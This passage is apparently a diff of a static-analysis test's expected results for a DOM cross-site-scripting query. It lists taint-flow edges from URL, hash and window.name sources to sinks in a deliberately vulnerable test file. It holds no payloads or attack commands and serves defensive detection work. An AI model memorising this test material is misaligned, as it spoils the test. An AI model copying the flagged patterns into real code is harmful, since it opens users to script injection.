tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... .search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... .search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... .search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... .search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| 